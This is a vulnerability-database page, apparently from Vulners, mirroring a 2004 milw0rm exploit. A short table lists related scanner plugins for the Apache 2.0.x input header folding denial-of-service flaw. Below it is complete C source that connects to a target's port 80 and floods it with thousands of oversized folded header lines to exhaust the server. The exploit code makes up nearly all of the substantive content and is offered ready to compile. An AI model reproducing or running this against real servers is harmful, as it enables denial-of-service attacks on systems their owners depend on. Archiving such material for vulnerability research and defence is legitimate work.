| Reporter | Title | Published | Views | Family All 33 |
|---|---|---|---|---|
| Apache Input Header Folding Remote DoS | 20 Aug 200400:00 | – | nessus | |
| Mac OS X Multiple Vulnerabilities (Security Update 2004-09-07) | 9 Sep 200400:00 | – | nessus | |
| Apache < 2.0.50 Input Header Folding and mod_ssl DoS | 23 Mar 200500:00 | – | nessus | |
| Apache 2.x < 2.0.50 Multiple Remote DoS | 29 Jun 200400:00 | – | nessus | |
| Fedora Core 1 : httpd-2.0.50-1.0 (2004-203) | 23 Jul 200400:00 | – | nessus | |
| Fedora Core 2 : httpd-2.0.50-2.1 (2004-204) | 23 Jul 200400:00 | – | nessus | |
| GLSA-200407-03 : Apache 2: Remote denial of service attack | 30 Aug 200400:00 | – | nessus | |
| Mac OS X Multiple Vulnerabilities (Security Update 2004-09-07) | 8 Sep 200400:00 | – | nessus | |
| Mandrake Linux Security Advisory : apache2 (MDKSA-2004:064) | 31 Jul 200400:00 | – | nessus | |
| RHEL 3 : httpd (RHSA-2004:342) | 6 Jul 200400:00 | – | nessus |
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#define A 0x41
#define PORT 80
struct sockaddr_in hrm;
int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
int i,x;
char buf[300],a1[8132],a2[50],host[100],content[100];
char *ip=argv[1],*new=malloc(sizeof(int));
sprintf(new,"\r\n");
memset(a1,'\0',8132);
memset(host,'\0',100);
memset(content,'\0',100);
a1[0] = ' ';
for(i=1;i<8132;i++)
a1[i] = A;
if(argc<2)
{
printf("%s: IP\n",argv[0]);
exit(0);
}
x = conn(ip);
printf("[x] Connected to: %s.\n",inet_ntoa(hrm.sin_addr));
sprintf(host,"Host: %s\r\n",argv[1]);
sprintf(content,"Content-Length: 50\r\n");
sprintf(buf,"GET / HTTP/1.0\r\n");
write(x,buf,strlen(buf));
printf("[x] Sending buffer...");
for(i=0;i<2000;i++)
{
write(x,a1,strlen(a1));
write(x,new,strlen(new));
}
memset(buf,'\0',300);
strcpy(buf,host);
strcat(buf,content);
for(i=0;i<50;i++)
a2[i] = A;
strcat(buf,a2);
strcat(buf,"\r\n\r\n");
write(x,buf,strlen(buf));
printf("done!\n");
close(x);
}
// milw0rm.com [2004-08-02]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation